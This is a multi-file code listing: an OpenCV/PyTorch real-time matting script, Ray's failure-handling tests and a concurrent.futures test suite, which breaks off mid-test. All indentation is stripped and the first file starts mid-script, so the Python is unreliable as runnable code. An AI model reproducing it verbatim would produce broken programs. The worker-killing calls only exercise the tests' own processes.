# Use .read() in a tight loop to get the newest frame
class Camera:
def __init__(self, device_id=0, width=1280, height=720):
self.capture = cv2.VideoCapture(device_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
# self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.success_reading, self.frame = self.capture.read()
self.read_lock = Lock()
self.thread = Thread(target=self.__update, args=())
self.thread.daemon = True
self.thread.start()
def __update(self):
while self.success_reading:
grabbed, frame = self.capture.read()
with self.read_lock:
self.success_reading = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
return frame
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
# An FPS tracker that computes exponentialy moving average FPS
class FPSTracker:
def __init__(self, ratio=0.5):
self._last_tick = None
self._avg_fps = None
self.ratio = ratio
def tick(self):
if self._last_tick is None:
self._last_tick = time.time()
return None
t_new = time.time()
fps_sample = 1.0 / (t_new - self._last_tick)
self._avg_fps = (
self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps
if self._avg_fps is not None
else fps_sample
)
self._last_tick = t_new
return self.get()
def get(self):
return self._avg_fps
# Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity.
# It also tracks FPS and optionally overlays info onto the stream.
class Displayer:
def __init__(self, title, width=None, height=None, show_info=True):
self.title, self.width, self.height = title, width, height
self.show_info = show_info
self.fps_tracker = FPSTracker()
self.fake_cam = None
cv2.namedWindow(self.title, cv2.WINDOW_NORMAL)
if width is not None and height is not None:
cv2.resizeWindow(self.title, width, height)
# Update the currently showing frame and return key press char code
def step(self, image):
fps_estimate = self.fps_tracker.tick()
if self.show_info and fps_estimate is not None:
message = f"{int(fps_estimate)} fps | {self.width}x{self.height}"
cv2.putText(
image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0)
)
if self.fake_cam is not None:
image_web = np.ascontiguousarray(image, dtype=np.uint8)
image_web = cv2.cvtColor(image_web, cv2.COLOR_RGB2BGR)
self.fake_cam.schedule_frame(image_web)
cv2.imshow(self.title, image)
return cv2.waitKey(1) & 0xFF
if "fp16" in args.model_checkpoint and not args.model_type == "jit":
precision = torch.float16
else:
precision = torch.float32
# --------------- Main ---------------
torch.set_num_threads(args.num_threads)
device = "cuda" if torch.cuda.is_available() else "cpu"
print(f"Using {args.num_threads} threads")
print(f"Using {precision} precision")
print(f"Using {device} device")
# Load model
if args.model_type == "mattingbase":
model = MattingBase(args.model_backbone)
if args.model_type == "mattingrefine":
model = MattingRefine(
args.model_backbone,
args.model_backbone_scale,
args.model_refine_mode,
args.model_refine_sample_pixels,
args.model_refine_threshold,
)
if args.model_type == "jit":
model = torch.jit.load(args.model_checkpoint)
else:
model.load_state_dict(
torch.load(args.model_checkpoint, map_location=device), strict=False
)
model = model.eval().to(device=device, dtype=precision)
width, height = args.resolution
if CSICamera is None:
cam = Camera(width=width, height=height)
else:
cam = CSICamera(
width=width,
height=height,
capture_width=1080,
capture_height=720,
capture_fps=30, # reduce to reduce lag
)
# cam.running = True
dsp = Displayer("MattingV2", cam.width, cam.height, show_info=(not args.hide_fps))
def cv2_frame_to_cuda(frame):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return (
ToTensor()(Image.fromarray(frame))
.unsqueeze_(0)
.to(device=device, dtype=precision)
)
# Convert to tensorRT
# not all operations supported :/
if trtorch is not None:
with torch.no_grad():
x = cv2_frame_to_cuda(cam.read())
print(x.shape)
shape = list(x.shape)
compile_settings = {
"input_shapes": [shape, shape],
# "input_shapes": [
# # [shape, shape]
# # {
# # "min": [1, 3, 224, 224],
# # "opt": [1, 3, 512, 512],
# # "max": [1, 3, 1024, 1024]
# # }, # For static size [1, 3, 224, 224]
# ],
"op_precision": torch.half, # Run with FP16
"num_min_timing_iters": 2, # Default: 2
"num_avg_timing_iters": 1, # Default: 1
"max_batch_size": 1, # Maximum batch size (must be >= 1 to be set, 0 means not set)
}
# script_model = torch.jit.script(model)
traced_model = torch.jit.trace(model, [x, x])
trt_ts_module = trtorch.compile(traced_model, compile_settings)
x = x.half()
result = trt_ts_module(x, x)
torch.jit.save(trt_ts_module, "trt_torchscript_module_fp16.ts")
|
failure_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import json
import os
import ray
import sys
import tempfile
import threading
import time
import ray.ray_constants as ray_constants
from ray.utils import _random_string
import pytest
from ray.test.cluster_utils import Cluster
def relevant_errors(error_type):
return [info for info in ray.error_info() if info["type"] == error_type]
def wait_for_errors(error_type, num_errors, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(relevant_errors(error_type)) >= num_errors:
return
time.sleep(0.1)
raise Exception("Timing out of wait.")
@pytest.fixture
def ray_start_regular():
# Start the Ray processes.
ray.init(num_cpus=2)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
return module.temporary_python_file()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_regular):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.error_info()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_local_scheduler = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
f.remote()
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(Exception):
ray.get(obj)
with pytest.raises(Exception):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(ray.error_info()) == 0, (
"Should not have propogated an error - {}".format(ray.error_info()))
@pytest.fixture
def ray_start_object_store_memory():
# Start the Ray processes.
store_size = 10**6
ray.init(num_cpus=1, object_store_memory=store_size)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.mark.skip("This test does not work yet.")
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.HEARTBEAT_BATCH,
ray.gcs_utils.TablePubsub.HEARTBEAT_BATCH, fake_id, malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
@pytest.fixture
def ray_start_two_nodes():
# Start the Ray processes.
cluster = Cluster()
for _ in range(2):
cluster.add_node(
num_cpus=0,
_internal_config=json.dumps({
"num_heartbeats_timeout": 40
}))
ray.init(redis_address=cluster.redis_address)
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_two_nodes):
cluster = ray_start_two_nodes
cluster.wait_for_nodes()
client_ids = {item["ClientID"] for item in ray.global_state.client_table()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_client_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert client_ids == warning_client_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID(_random_string())
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(Exception, match=r".*Connection closed unexpectedly.*"):
ray.get(nonexistent_id)
thread.join()
|
test_futures.py
|
import os
import subprocess
import sys
import threading
import functools
import contextlib
import logging
import re
import time
import gc
import traceback
from StringIO import StringIO
from test import test_support
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor)
from concurrent.futures.thread import cpu_count
try:
import unittest2 as unittest
except ImportError:
import unittest
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
If threading is unavailable this function does nothing.
"""
@functools.wraps(func)
def decorator(*args):
key = test_support.threading_setup()
try:
return func(*args)
finally:
test_support.threading_cleanup(*key)
return decorator
# Executing the interpreter in a subprocess
def _assert_python(expected_success, *args, **env_vars):
cmd_line = [sys.executable]
if not env_vars:
cmd_line.append('-E')
# Need to preserve the original environment, for in-place testing of
# shared library builds.
env = os.environ.copy()
# But a special flag that can be set to override -- in this case, the
# caller is responsible to pass the full environment.
if env_vars.pop('__cleanenv', None):
env = {}
env.update(env_vars)
cmd_line.extend(args)
p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
try:
out, err = p.communicate()
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
rc = p.returncode
err = strip_python_stderr(err)
if (rc and expected_success) or (not rc and not expected_success):
raise AssertionError(
"Process return code is %d, "
"stderr follows:\n%s" % (rc, err.decode('ascii', 'ignore')))
return rc, out, err
def assert_python_ok(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
variables `env_vars` is ok and return a (return code, stdout, stderr) tuple.
"""
return _assert_python(True, *args, **env_vars)
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(r"\[\d+ refs\]\r?\n?$".encode(), "".encode(), stderr).strip()
return stderr
@contextlib.contextmanager
def captured_stderr():
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
logging_stream = StringIO()
handler = logging.StreamHandler(logging_stream)
logging.root.addHandler(handler)
try:
yield logging_stream
finally:
logging.root.removeHandler(handler)
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError:
e = sys.exc_info()[1]
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test_support.verbose:
print("%.2fs" % dt)
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest(unittest.TestCase):
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import %s
from time import sleep
from test_futures import sleep_and_print
t = %s(5)
t.submit(sleep_and_print, 1.0, "apple")
""" % (self.executor_type.__name__, self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), "apple".encode())
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join(5)
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join(5)
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
t.join(5)
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
self.assertRegexpMatches(t.name, r'^SpecialPool_[0-4]$')
t.join(5)
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegexpMatches(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join(5)
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes:
p.join(5)
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes:
p.join(5)
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
gc.collect()
gc.collect()
queue_management_thread.join(5)
for p in processes:
p.join(5)
class WaitTests(unittest.TestCase):
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=1.5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
fs = set(self.executor.submit(future_func) for i in range(100))
event.set()
